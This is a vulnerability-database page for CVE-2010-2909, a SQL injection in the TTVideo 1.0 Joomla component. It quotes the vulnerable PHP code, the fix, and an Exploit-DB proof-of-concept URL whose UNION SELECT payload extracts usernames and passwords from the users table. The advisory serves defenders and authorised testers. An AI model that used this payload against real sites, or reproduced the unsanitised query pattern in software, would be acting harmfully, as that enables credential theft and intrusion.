CVE-2010-2909
Description
SQL injection vulnerability in ttvideo.php in the TTVideo (com_ttvideo) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the cid parameter in a video action to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component TTVideo 1.0 - SQL Injection
TTVideo 1.0 Joomla Component SQL Injection Vulnerability
Download link: http://www.toughtomato.com/resources/downloads/joomla-1.5/components/ttvideo/
Name TTVideo
Vendor http://www.toughtomato.com
Versions Affected 1.0
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-07-27
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
________________________
TTVideo is a Joomla! component that makes use of the
popular video sharing site Vimeo to create a video
library.
II. DESCRIPTION
_______________
A parameter in ttvideo.php is not properly sanitised
before being used in a SQL query.
III. ANALYSIS
_____________
Summary:
A) SQL Injection
A) SQL Injection
________________
The parameter cid passed to ttvideo.php when task is set
to video is not properly sanitised before being used in
a SQL query. This can be exploited to manipulate SQL
queries by injecting arbitrary SQL code. The following
is the vulnerable code:
ttvideoController.php (line 40):
function video() {
$cid = JRequest::getVar('cid', null, 'default');
ttvideo.php (line 188):
function getVideo($id) {
$db = $this->getDBO();
$db->setQuery("SELECT * from #__ttvideo WHERE id=$id");
$video = $db->loadObject();
if ($video === null)
JError::raiseError(500, 'Video with ID: '.$id.' not found.');
return $video;
}
IV. SAMPLE CODE
_______________
A) SQL Injection
http://site/path/index.php?option=com_ttvideo&task=video&cid=-1 UNION SELECT 1,2,3,4,5,6,7,8,CONCAT(username,0x3A,password),10,11,12,13,14,15,16,17 FROM jos_users
V. FIX
______
Use JRequest::getInt instead of JRequest::getVarApplication impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| toughtomato | com_ttvideo | 1.0 | |
| joomla | joomla\! | | |
References
- http://adv.salvatorefresta.net/TTVideo_1.0_Joomla_Component_SQL_Injection_Vulnerability-27072010.txt
- http://osvdb.org/66630
- http://secunia.com/advisories/40716
- http://www.exploit-db.com/exploits/14481
- http://www.securityfocus.com/archive/1/512685/100/0/threaded
- http://www.securityfocus.com/archive/1/512709/100/0/threaded
- http://www.toughtomato.com/downloads/16-comttvideo-1-0-1/file
- https://exchange.xforce.ibmcloud.com/vulnerabilities/60662
- http://adv.salvatorefresta.net/TTVideo_1.0_Joomla_Component_SQL_Injection_Vulnerability-27072010.txt
- http://osvdb.org/66630
- http://secunia.com/advisories/40716
- http://www.exploit-db.com/exploits/14481
- http://www.securityfocus.com/archive/1/512685/100/0/threaded
- http://www.securityfocus.com/archive/1/512709/100/0/threaded
- http://www.toughtomato.com/downloads/16-comttvideo-1-0-1/file
- https://exchange.xforce.ibmcloud.com/vulnerabilities/60662
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.